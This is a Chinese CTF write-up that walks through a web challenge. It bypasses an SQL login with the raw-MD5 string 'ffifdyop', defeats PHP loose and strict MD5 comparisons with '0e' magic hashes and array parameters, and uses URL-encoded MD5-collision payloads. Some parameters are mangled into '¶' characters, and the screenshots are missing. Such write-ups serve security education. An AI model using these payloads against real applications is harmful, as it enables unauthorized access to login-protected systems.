进入题目,页面内容如下:
查看源代码,没有发现什么有价值的信息。
提交查询时抓包,发包后出现提示:
给了一句 SQL 代码的提示。
参考博客:https://www.cnblogs.com/tqing/p/11852990.html
select * from 'admin' where password=md5($pass,true)
一些字符串经过 MD5 加密后会变成万能密码的形式:
ffifdyop
:
129581926211651571912466741651878684928
:
所以这里理论上直接传入参数 password=ffifdyop
或者 password=129581926211651571912466741651878684928
就行,这里不知道为什么,burp 发包得到的返回结果始终是 200 OK
,只有去 web 页面测试才会跳转到 levels91.php
页面,而且只有 ffifdyop
这个 payload 测成功了,不知道是不是长度限制的问题。
levels91.php
页面:
查看源代码,源代码中给出了这样一段注释信息:
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
header('Location: levell14.php');
-->
如果两个字符经 MD5 加密后的值为 0exxxxx 形式,就会被认为是科学计数法,且表示的是 0*10 的 xxxx 次方,还是零,都是相等的。
下列的字符串的 MD5 值都是 0e 开头的:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
get 传参 ?a=QNKCDZO&b=240610708
get 传参 ?a[]=1&b[]=2
关于数组绕过的原理,我会详细解释一下,首先需要重新理解一下 URL 传参。
URL 传参
URL 传参的时候,可以直接传入参数:para=123
也可以用数组形式分段传入:para[]=1¶[]=2¶[]=3
分段传入的数据在服务器会被拼接成一个整体,即 123 ,这种传参方式与第一种没有区别。
还可以同一参数名多次传参:para=1¶=2¶=3
,与前两种没有区别。
这就是为什么 URL 中可以用数组传参。
绕过原理
PHP 的 MD5 函数是无法处理数组的,在处理数组时会返回 NULL ,两边都返回 NULL ,那么就相等了。
条件
数组绕过是有条件的,PHP 8 是无法使用数组绕过的。
直接找两个本身不一样但是 MD5 加密后一样的字符串。这个过程称为 MD5 碰撞。
payload
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
payload 来源
版权声明:本文为CSDN博主「小 白 萝 卜」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/EC_Carrot/article/details/109525162
绕过后跳转到 levell14.php 页面,其内容为:
<?php
error_reporting(0);
include"flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
在弱比较的绕过中,后两种都是可以的。
原理在弱比较的绕过中已经讲了,这里直接上 payload :
POST 传参:param1[]=1¶m2[]=2
拿到 flag :
POST 传参:
param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2¶m2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
拿到 flag :